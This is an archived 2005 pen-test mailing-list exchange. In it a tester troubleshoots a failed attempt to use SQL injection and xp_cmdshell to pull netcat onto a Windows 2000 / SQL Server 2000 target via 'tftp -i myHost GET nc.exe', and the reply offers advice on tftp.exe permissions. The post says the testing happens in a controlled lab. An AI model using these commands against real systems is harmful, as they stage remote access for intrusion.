Re: TFTP and XP_CMDSHELL - Weird

From: Andres Molinetti (andymolinetti@hotmail.com)
Date: Thu Jun 23 2005 - 09:47:53 EDT


>From: Diego Kellner <dkepler@gmail.com>
>Reply-To: pen-test@securityfocus.com
>To: Andres Molinetti <andymolinetti@hotmail.com>
>CC: pen-test@securityfocus.com
>Subject: Re: TFTP and XP_CMDSHELL - Weird
>Date: Thu, 23 Jun 2005 09:35:40 -0300
>
>Does the TFTP even start? What is the error message you get?

If it is any useful I recieve the following error on the Target machine:
"tftp: No se puede escribir en el archivo local 'c:\xx.exe'"
(tftp: Not able to write in local file 'c:\xx.exe')

In a tcpdump in my TFTP Server I get the following error:
10:41:37.528994 IP TARGET.1942 > SERVER.tftp: 48 ERROR EACCESS no se puede
abrir el archivo para escritura"
(cannot open file for writing)

Check to
>see the permissions on tftp.exe (the SQL may not be properly patched,
>but someone might have taken the time to secure some key executables
>on WINNT directory according to best practices). If you have no direct
>access to see the permissions on this file, check to see if ping.exe
>works (another 'dangerous' executable that is usually secured along
>with tftp.exe, dcpromo.exe, etc).

I am testing it in my own controlled environment. I installed the TARGET
myself and it only has Windows 2000 SP4 with latest patches and SQL Server
2000 unpatched.
Ping works.
Besides, tftp works, but only with admin privileges.

>Regards,
>Kepler
>
>
>On 6/22/05, Andres Molinetti <andymolinetti@hotmail.com> wrote:
> > Hi, I am testing a Web App vulnerable to SQL Injection.
> > It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
> >
> > While trying to use the xp_cmdshell to upload nc.exe from my tftpd
>server to
> > the Webserver, I experienced some problems.
> >
> > I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
> >
> > As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost
>GET
> > nc.exe c:\nc.exe". File is downloaded.
> >
> > When I tried it through the wep app it failed. I tried directly through
>SQL
> > Query Analizer and it also failed.
> >
> > SQL is running as a low priviledged account (sqlsvc)...
> >
> > Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET
>nc.exe
> > c:\nc.exe" and IT FAILED.!!
> >
> > I can easily deduce that the problem is the TFTP client (tftp.exe)...
> >
> > Any Ideas?
> >
> > _________________________________________________________________
> > Moda para esta temporada. Ponte al día de todas las tendencias.
> > http://www.msn.es/Mujer/moda/default.asp
> >
> >

_________________________________________________________________
Un amor, una aventura, compañía para un viaje. Regístrate gratis en MSN Amor
& Amistad. http://match.msn.es/match/mt.cfm?pg=channel&tcid=162349



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:29 EDT